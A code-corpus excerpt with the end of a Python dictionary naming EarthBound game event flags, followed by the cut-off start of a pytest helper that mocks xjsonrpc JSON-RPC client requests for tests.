324: 'SHOP_RED_SNAKE',
325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT',
326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER',
327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT',
328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1',
329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT',
330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT',
331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2',
332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT',
333: 'DESERT_MINE_BULLDOZER_MOVED',
334: 'BUBBLE_MONKEY_JOINS',
335: 'TONY_AT_BOARDING_SCHOOL_GATE',
336: 'GOT_KEY_TO_DUNGEON_MAN',
337: 'CALLED_STOIC_CLUB',
338: 'NEAR_WINTERS_ROPE',
339: 'APPLE_KID_NOT_AT_HIS_HOUSE',
# 340 (???)
341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER',
342: 'PYRAMID_OPEN',
343: 'GOT_HIEROGLYPH_COPY',
344: 'LAKE_TESS_WIND_BLOWING',
# 345 (Related to Lake Tess. This is only set if you're near (0x02A0, 0x0D70) in a radius of 16 pixels)
346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY',
347: 'PYRAMID_HOLE_OPEN',
348: 'GOT_HAWK_EYE',
349: 'JUST_WOKE_UP_FROM_MAGICANT',
350: 'USED_ELEVATOR',
351: 'HH_HQ_CULTIST_1_DEFEATED',
352: 'HH_HQ_CULTIST_2_DEFEATED',
353: 'HH_HQ_CULTIST_3_DEFEATED',
354: 'HH_HQ_CULTIST_4_DEFEATED',
355: 'HH_HQ_CULTIST_5_DEFEATED',
356: 'HH_HQ_CULTIST_6_DEFEATED',
357: 'SENTRY_ROBOT_1_DEFEATED',
358: 'SENTRY_ROBOT_2_DEFEATED',
359: 'SENTRY_ROBOT_3_DEFEATED',
360: 'SENTRY_ROBOT_4_DEFEATED',
361: 'SENTRY_ROBOT_5_DEFEATED',
362: 'SENTRY_ROBOT_6_DEFEATED',
363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED',
364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED',
365: 'SHARK_AT_ARCADE_ABSENT',
366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT',
367: 'SLIMY_LITTLE_PILE_2_DEFEATED',
368: 'SLIMY_LITTLE_PILE_3_DEFEATED',
369: 'CAN_ENTER_BELCHS_FACTORY',
# 370 (Unknown. Related to traffic jam?)
# 371 (???)
372: 'PARTY_IS_ROBOTIFIED',
# 373 (Unknown. Related to Boogey Tent)
374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED',
375: 'PEOPLE_IN_ONETT',
# 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine)
# 377 (???)
# 378 (???)
379: 'ANDONUTS_AT_LAB_ABSENT',
# 380 (???)
# 381 (???)
382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT',
383: 'JUST_RESTED',
384: 'GOT_ALL_MELODIES',
385: 'GOT_CONTACT_LENS',
386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to the script for this battle
387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED',
388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED',
389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED',
390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and never fights you
391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag and never fights you
392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED',
393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED',
394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED',
395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED',
396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED',
397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED',
398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED',
399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED',
400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED',
401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED',
402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED',
403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED',
404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED',
405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED',
406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED',
407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED',
408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED',
409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED',
410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED',
411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED',
412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED',
413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED',
414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED',
415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED',
416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED',
417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED',
418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED',
419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED',
420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED',
421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED',
422: 'ONETT_DAYTIME',
423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING',
424: 'TENDA_SHOP_PLAIN_ROLL_1',
425: 'TENDA_SHOP_PLAIN_YOGURT',
426: 'TENDA_SHOP_PLAIN_ROLL_2',
427: 'TENDA_SHOP_SPICY_JERKY',
428: 'TENDA_SHOP_BAG_OF_DRAGONITE',
429: 'TENDA_SHOP_TALISMAN_COIN',
430: 'TENDA_SHOP_HALL_OF_FAME_BAT',
# 431 (???)
432: 'DEBUG_SKIP_SANDWICH_DX',
433: 'ZOMBIE_CHICK_HOTEL_MUSIC',
434: 'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them might be responsible only for palette changes, maybe)
435: 'GUARDIAN_GENERAL_DEFEATED',
436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED',
437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED',
438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED',
439: 'GOT_MAGIC_TRUFFLE_1',
440: 'GOT_MAGIC_TRUFFLE_2',
441: 'GOT_MAGIC_TRUFFLE_3',
442: 'GOT_MAGIC_TRUFFLE_4',
443: 'GOT_MAGIC_TRUFFLE_5',
444: 'KING_JOINS',
445: 'TALKED_TO_BRICK_ROADS_HEAD',
446: 'FOR_SALE_SIGN_CUSTOMER_1',
# 447 (???)
# 448 (???)
449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE',
450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK',
451: 'MONKEY_CAVE_SKIP_SANDWICH',
452: 'MONKEY_CAVE_PICNIC_LUNCH',
453: 'MONKEY_CAVE_WET_TOWEL',
454: 'MONKEY_CAVE_PIZZA_1',
455: 'MONKEY_CAVE_PROTEIN_DRINK',
456: 'MONKEY_CAVE_PIZZA_2',
457: 'MONKEY_CAVE_HAMBURGER_1',
458: 'MONKEY_CAVE_HAMBURGER_2',
459: 'MONKEY_CAVE_KING_BANANA',
460: 'MONKEY_CAVE_HAMBURGER_3',
461: 'MONKEY_CAVE_FRESH_EGG',
462: 'MONKEY_CAVE_RULER',
463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY',
464: 'GOT_KING_BANANA',
# 465 (???)
466: 'PICKY_SLEEPING_AT_METEORITE',
# 467 (Unknown. Related to Ness's house door knocking?)
468: 'POKEYS_HOUSE_LOCKED',
469: 'POLICE_AT_METEORITE',
470: 'TALKED_TO_TRACY_AT_HER_ROOM',
471: 'TALKED_TO_MOM',
472: 'TALKED_TO_POKEY_AT_METEORITE',
473: 'TRACY_AT_HALLWAY',
474: 'NESS_MOM_OUTSIDE',
# 475 (Handles continue yes/no on death. TODO: Investigate)
476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP',
477: 'NESS_SLEEPING_AT_HIS_BED',
478: 'SHOP_SCARABA_CONDIMENTS',
479: 'PHOTO_NESS_HOUSE_AVAILABLE',
480: 'PHOTO_SCAM_HOUSE_AVAILABLE',
481: 'PHOTO_CYCLE_SHOP_AVAILABLE',
482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE',
483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE',
484: 'PHOTO_CHAOS_THEATER_AVAILABLE',
485: 'PHOTO_LAKE_TESS_AVAILABLE',
486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE',
487: 'PHOTO_THREED_CEMETERY_AVAILABLE',
488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE',
489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE',
490: 'PHOTO_CIRCUS_TENT_AVAILABLE',
491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE',
492: 'PHOTO_DESERT_MINE_AVAILABLE',
493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE',
494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE',
495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE',
496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE',
497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE',
498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE',
499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE',
500: 'PHOTO_STONEHENGE_AVAILABLE',
501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE',
502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE',
503: 'PHOTO_SUMMERS_BEACH_AVAILABLE',
504: 'PHOTO_TOTO_AVAILABLE',
505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE',
506: 'PHOTO_PYRAMID_AVAILABLE',
507: 'PHOTO_SCARABA_OASIS_AVAILABLE',
508: 'PHOTO_DEEP_DARKNESS_AVAILABLE',
509: 'PHOTO_TENDA_VILLAGE_AVAILABLE',
510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE',
511: 'GOT_TOWN_MAP',
512: 'HAS_EXIT_MOUSE',
513: 'ONETT_POST_METEORITE_MUSIC',
514: 'JUST_RESTED_AT_HOME',
515: 'FRANK_DEFEATED',
516: 'MONKEY_CAVE_PENCIL_ERASED',
517: 'NESS_ROOM_LIGHTS_ON',
518: 'GUARDIAN_MOLE_TEXT_1',
519: 'GUARDIAN_MOLE_TEXT_2',
520: 'GUARDIAN_MOLE_TEXT_3',
521: 'GUARDIAN_MOLE_TEXT_4',
# 522 (Multipurpose?)
# 523 (Multipurpose?)
524: 'YOUR_SANCTUARY_MUSIC',
# 525 (???)
526: 'NEAR_BLUE_GEYSER_1',
527: 'NEAR_RED_GEYSER',
528: 'NEAR_BLUE_GEYSER_2',
# 529 (???)
530: 'TRACY_NOT_AT_HER_ROOM',
531: 'TRACY_DOWNSTAIRS',
532: 'NESS_ROOM_METEORITE_FALLING_MUSIC',
533: 'NESS_ROOM_METEORITE_CRASH_MUSIC',
534: 'CITY_BUS_MUSIC',
535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC',
536: 'RUNAWAY_FIVE_FREE_MUSIC',
537: 'TESSIE_MUSIC',
# 538 (???)
539: 'GIVEN_PLAYERS_NAME',
# 540 (???)
541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR',
542: 'SAILING_OR_SUBMARINE_MUSIC',
543: 'SAILING_POST_KRAKEN_MUSIC',
544: 'WINTERS_MUSIC',
545: 'LAST_MELODY_AT_LILLIPUT_STEPS',
546: 'LAST_MELODY_AT_MILKY_WELL',
547: 'LAST_MELODY_AT_PINK_CLOUD',
548: 'LAST_MELODY_AT_FIRE_SPRING',
549: 'QUEUE_OUTSIDE_CHAOS_THEATER',
550: 'GOT_SUPORMA',
551: 'GAVE_FOOD_TO_APPLE_KID',
552: 'GOT_ZOMBIE_PAPER',
553: 'GOT_BACKSTAGE_PASS',
554: 'GOT_YOGURT_DISPENSER',
555: 'FOURSIDE_DEPT_LIGHTS_OUT',
556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED',
557: 'READY_TO_SAIL_TO_SCARABA',
558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP',
559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP',
560: 'HIDE_ONETT_HOTEL_TOWN_MAP',
561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP',
562: 'HIDE_ONETT_BAKERY_TOWN_MAP',
563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP',
564: 'HIDE_TWOSON_HOTEL_TOWN_MAP',
565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP',
566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP',
567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP',
568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP',
569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP',
570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP',
571: 'HIDE_THREED_HOTEL_TOWN_MAP',
# 572 (???)
573: 'HIDE_THREED_BAKERY_TOWN_MAP',
574: 'HIDE_THREED_HOSPITAL_TOWN_MAP',
575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP',
576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP',
577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP',
578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP',
579: 'HIDE_SCARABA_HOTEL_TOWN_MAP',
580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP',
581: 'HIDE_SCARABA_SHOP_TOWN_MAP',
582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP',
583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP',
584: 'HIDE_SUMMERS_SHOP_TOWN_MAP',
585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP',
586: 'HIDE_TOTO_SHOP_TOWN_MAP',
587: 'FLYING_MAN_MUSIC',
# 588 (Visibility flag for someone in Threed?)
# 589 (Visibility flag for some Hotel Attendant?)
590: 'HAPPY_THREED_PEOPLE',
591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM
592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM
593: 'POO_TELEPORTING_TO_SUMMERS',
594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM
595: 'STAR_MASTER_NEXT_TO_MU',
# 596 (???)
597: 'SHOP_SCARABA_BAZAAR_FOOD',
598: 'SHOP_SCARABA_WATER',
599: 'SHOP_SOUTH_SCARABA_VARIETY',
600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN',
601: 'SHATTERED_MAN_1_DEFEATED',
602: 'SHATTERED_MAN_2_DEFEATED',
603: 'MINI_BARF_DEFEATED',
604: 'GOT_KEY_TO_THE_LOCKER',
605: 'USED_KEY_TO_THE_LOCKER',
606: 'DUNGEON_MAN_OPEN',
# 607 (Unknown. Related to desert mine?)
608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT',
609: 'WINTERS_PENCIL_ERASED',
610: 'DETECTIVE_IN_THREED',
# 611 (Something about talking to Paula's dad and not talking to Everdred)
612: 'EVERDRED_NOT_AT_ROOF',
613: 'TELEPORT_MONKEY_NOT_AT_CAVE',
614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE',
615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD',
616: 'TENDAKRAUT_STOLEN',
617: 'MAGIC_CAKE_LADY_AT_BEACH',
618: 'GOT_ERASER_ERASER',
# 619 (Unkonwn. Related to Stonehenge Base)
620: 'APPLE_MOUSE_AT_WINTERS_LAB',
621: 'MONKEYS_AT_WINTERS_LAB',
622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS',
623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED',
624: 'EVERDRED_AT_HIS_HOUSE',
# 625 (Something about "Fancy Pokey" in the Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli Building?
626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT',
627: 'TRACY_HAS_SOUND_STONE',
628: 'PRESENTS_AT_SATURN_VALLEY',
629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT',
630: 'BUBBLE_MONKEY_AT_LAKE_TESS',
631: 'TALKED_TO_MOONSIDE_MONOTOLI',
632: 'MONSTERS_IN_ONETT',
633: 'LIERS_HOUSE_UNLOCKED',
634: 'PAULA_TELEPATHY_DREAM_1',
635: 'PAULA_TELEPATHY_DREAM_2',
636: 'PAULA_TELEPATHY_DREAM_JEFF',
637: 'POO_AT_HIS_PALACE',
638: 'PAULA_AT_HER_ROOM',
639: 'TALKED_TO_MAGICANT_EVERDRED',
640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP',
641: 'HIDE_THREED_TO_DESERT_TOWN_MAP',
642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP',
643: 'READY_TO_LOOK_AT_PHOTO_ALBUM',
644: 'GOT_SATURN_RIBBON',
645: 'ESCARGO_EXPRESS_PICK_UP',
646: 'FOR_SALE_SIGN_CUSTOMER_2',
647: 'FOR_SALE_SIGN_CUSTOMER_3',
648: 'FOR_SALE_SIGN_CUSTOMER_4',
649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE',
650: 'GOT_MONKEYS_LOVE',
651: 'UNDERWORLD_TENDA_GATE_OPEN',
652: 'USED_CARROT_KEY',
653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER',
654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE',
655: 'SKY_RUNNER_MUSIC',
656: 'ALT_BUY_SOUND_EFFECT',
657: 'BOUGHT_OR_SOLD_AT_SHOP',
658: 'BOUGHT_WEAPON',
659: 'MOONSIDE_SWITCH_YES_NO',
660: 'ALT_NO_TALK_TEXT',
661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC',
662: 'DUNGEON_MAN_DESERT_MUSIC',
663: 'RETURNED_SHYNESS_BOOK',
664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT',
665: 'GOT_LETTER_FROM_MOM',
666: 'GOT_LETTER_FROM_TONY',
667: 'GOT_LETTER_FROM_KIDS',
668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT',
669: 'FLY_HONEY_TRASH_CAN_VISIBLE',
670: 'GOT_FOR_SALE_SIGN',
# 671 (???)
672: 'POKEY_FLIES_AWAY_BY_HELICOPTER',
673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP',
674: 'HIDE_SCARABA_FOOD_TOWN_MAP',
675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY',
676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP',
677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP',
678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP',
# 679 (Something about Venus show about to start?)
# 680 (Something about Venus show about to start?)
681: 'SHOW_ONETT_HINT_TOWN_MAP',
682: 'SHOW_TWOSON_HINT_TOWN_MAP',
683: 'SHOW_THREED_HINT_TOWN_MAP',
684: 'SHOW_FOURSIDE_HINT_TOWN_MAP',
685: 'SHOW_SUMMERS_HINT_TOWN_MAP',
686: 'SHOW_SCARABA_HINT_TOWN_MAP',
687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING',
688: 'HAS_CALLED_MOM',
689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA',
690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER',
691: 'POO_LEFT_WITH_HAWK_EYE',
692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER',
693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE',
694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY',
695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY',
696: 'RANDOM_JEFF_ITEM_FIX_CHANCE',
697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED',
698: 'GOT_PHOTO_NESS_HOUSE',
699: 'GOT_PHOTO_SCAM_HOUSE',
700: 'GOT_PHOTO_CYCLE_SHOP',
701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY',
702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN',
703: 'GOT_PHOTO_CHAOS_THEATER',
704: 'GOT_PHOTO_LAKE_TESS',
705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON',
706: 'GOT_PHOTO_THREED_CEMETERY',
707: 'GOT_PHOTO_GRAPEFRUIT_FALLS',
708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE',
709: 'GOT_PHOTO_CIRCUS_TENT',
710: 'GOT_PHOTO_BLACK_SESAME_SEED',
711: 'GOT_PHOTO_DESERT_MINE',
712: 'GOT_PHOTO_FOURSIDE_BRIDGE',
713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE',
714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE',
715: 'GOT_PHOTO_MONOTOLI_BUILDING',
716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE',
717: 'GOT_PHOTO_POOS_PALACE_INSIDE',
718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE',
719: 'GOT_PHOTO_STONEHENGE',
720: 'GOT_PHOTO_SUMMERS_HOTEL',
721: 'GOT_PHOTO_FOURSIDE_RESTAURANT',
722: 'GOT_PHOTO_SUMMERS_BEACH',
723: 'GOT_PHOTO_TOTO',
724: 'GOT_PHOTO_SCARABA_BAZAAR',
725: 'GOT_PHOTO_PYRAMID',
726: 'GOT_PHOTO_SCARABA_OASIS',
727: 'GOT_PHOTO_DEEP_DARKNESS',
728: 'GOT_PHOTO_TENDA_VILLAGE',
729: 'GOT_PHOTO_SATURN_VALLEY_FINAL',
730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE',
731: 'SHOP_UNDERWORLD_TENDA',
732: 'SHOP_MAGICANT',
733: 'SHOP_MOONSIDE',
734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE',
735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER',
736: 'GOT_PAIR_OF_DIRTY_SOCKS',
737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES',
738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE',
739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL',
740: 'PEOPLE_IN_THREED_ABSENT',
741: 'MONOTOLI_AT_48TH_FLOOR',
742: 'LARDNA_AT_HOME',
743: 'VISITED_HAPPY_HAPPY_VILLAGE',
744: 'TALKED_TO_CARPAINTER',
745: 'QUEST_TO_YOGURT_MACHINE',
746: 'SCAM_HOUSE_UNLOCKED',
# 747 (??? Something about Runaway Five Tour Bus???)
748: 'SKY_RUNNER_AT_WINTERS_LAB',
749: 'NESS_WEARING_PAJAMAS',
750: 'LEFT_HOME_AT_LEAST_ONCE',
751: 'CHAOS_THEATER_AUDIENCE_ABSENT',
752: 'HINT_GUY_ABSENT',
753: 'NESS_HOUSE_PHONE_RINGING',
754: 'PREVENT_TELEPORT',
755: 'GOT_INSIGNIFICANT_ITEM',
756: 'DUNGEON_MAN_IN_PARTY',
757: 'GEORGE_HAS_DIAMOND',
758: 'GOING_TO_MAGICANT_MUSIC',
759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852
760: 'PHASE_DISTORTER_MUSIC',
# 761 (Unknown. Set when arriving in Threed, cleared when defeating Belch)
762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN',
763: 'PICKY_KNOCKING_ON_DOOR',
764: 'READY_TO_LEARN_TELEPORT',
765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS',
766: 'EXIT_MOUSE_DISAGREEABLE',
767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS',
768: 'PAID_MUSEUM_ENTRANCE_FEE',
# 769 (Checked when you talk to Tracy after defeating Giygas, but never set)
770: 'LAST_ESCARGO_EXPRESS_CALL',
# 771 (???)
772: 'LAST_DAD_CALL',
773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457 and #459
774: 'TALKED_TO_MOONSIDE_SAILOR_MAN',
# 775 (Can't get calls from Dad?)
776: 'PAULA_AT_MONOTOLI_BUILDING',
777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA',
778: 'EXIT_MOUSE_ASLEEP',
# 779 (Related to PREVENT_TELEPORT?)
# 780 (If set, Maxwell doesn't actually save your game. WHAT?)
805: 'PRESENT_CRACKED_BAT',
829: 'PRESENT_TONY_COOKIE_1',
830: 'PRESENT_TONY_COOKIE_2',
831: 'PRESENT_TONY_COOKIE_3',
832: 'PRESENT_TONY_COOKIE_4',
833: 'PRESENT_TONY_COOKIE_5',
834: 'PRESENT_TONY_COOKIE_6',
835: 'PRESENT_TONY_COOKIE_7'
}
| 1.3125 | 1 |
xjsonrpc/client/integrations/pytest.py | bernhardkaindl/pjrpc | 0 | 12796216 | """
`pytest <https://docs.pytest.org/en/latest/>`_ client library integration.
Implements some utilities for mocking out ``xjsonrpc`` library clients.
"""
import asyncio
import collections
import functools as ft
import json
import unittest.mock
from typing import Any, Callable, Dict, Optional, Union
import pytest
import xjsonrpc
from xjsonrpc import Response
from xjsonrpc.common import UNSET, UnsetType
class Match:
"""
Match object. Incorporates request matching information.
"""
def __init__(
self,
endpoint: str,
version: str,
method_name: str,
once: bool,
callback: Optional[Callable],
**response_data: Any,
):
self.endpoint = endpoint
self.version = version
self.method_name = method_name
self.once = once
self.callback = callback
self.response_data = response_data
class PjRpcMocker:
"""
Synchronous JSON-RPC client mocker.
:param target: method to be mocked
:param mocker: mocking package
:param passthrough: pass not mocked requests to the original method
"""
def __init__(self, target, mocker=unittest.mock, passthrough: bool = False):
self._target = target
self._mocker = mocker
self._patcher = None
self._async_resp = False
self._passthrough = passthrough
self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list))
self._calls: Dict = collections.defaultdict(dict)
@property
def calls(self) -> Dict:
"""
Dictionary of JSON-PRC method calls.
"""
return self._calls
def add(
self,
endpoint: str,
method_name: str,
result: UnsetType = UNSET,
error: UnsetType = UNSET,
id: Optional[Union[int, str]] = None,
version: str = '2.0',
once: bool = False,
callback: Optional[Callable] = None,
) -> None:
"""
Appends response patch. If the same method patch already exists they will be used in a round-robin way.
:param endpoint: request endpoint
:param method_name: method name
:param result: patched result
:param error: patched error
:param id: patched request id
:param version: patched request version
:param once: if ``True`` the patch will be deleted after the first call
:param callback: patched request callback
"""
match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)
self._matches[endpoint][(version, method_name)].append(match)
def replace(
self,
endpoint: str,
method_name: str,
result: UnsetType = UNSET,
error: UnsetType = UNSET,
id: Optional[Union[int, str]] = None,
version: str = '2.0',
once: bool = False,
callback: Optional[Callable] = None,
idx: int = 0,
):
"""
Replaces a previously added response patch by a new one.
:param endpoint: request endpoint
:param method_name: method name
:param result: patched result
:param error: patched error
:param id: patched request id
:param version: patched request version
:param once: if ``True`` the patch will be deleted after the first call
:param callback: patched request callback
:param idx: patch index (if there are more than one)
"""
match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)
self._matches[endpoint][(version, method_name)][idx] = match
def remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'):
"""
Removes a previously added response patch.
:param endpoint: request endpoint
:param method_name: method name
:param version: JSON-RPC request version
:returns: removed response patch
"""
if method_name is None:
result = self._matches.pop(endpoint)
else:
result = self._matches[endpoint].pop((version, method_name))
self._cleanup_matches(endpoint, version, method_name)
return result
def reset(self) -> None:
"""
Removes all added matches and reset call statistics.
"""
self._matches.clear()
for calls in self._calls.values():
for stub in calls.values():
stub.reset_mock()
self._calls.clear()
def start(self):
"""
Activates a patcher.
"""
patcher = self._mocker.patch(self._target)
with patcher:
if asyncio.iscoroutinefunction(patcher.temp_original):
self._async_resp = True
if self._async_resp:
async def side_effect(*args, **kwargs):
return await self._on_request(*args, **kwargs)
else:
def side_effect(*args, **kwargs):
return self._on_request(*args, **kwargs)
self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True)
return self._patcher.start()
def stop(self) -> None:
"""
Stop an active patcher.
"""
self.reset()
self._patcher.stop()
def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None) -> None:
matches = self._matches[endpoint].get((version, method_name))
if not matches:
self._matches[endpoint].pop((version, method_name), None)
if not self._matches[endpoint]:
self._matches.pop(endpoint)
def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any):
endpoint = origin_self._endpoint
matches = self._matches.get(endpoint)
if matches is None:
if self._passthrough:
return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs)
else:
raise ConnectionRefusedError()
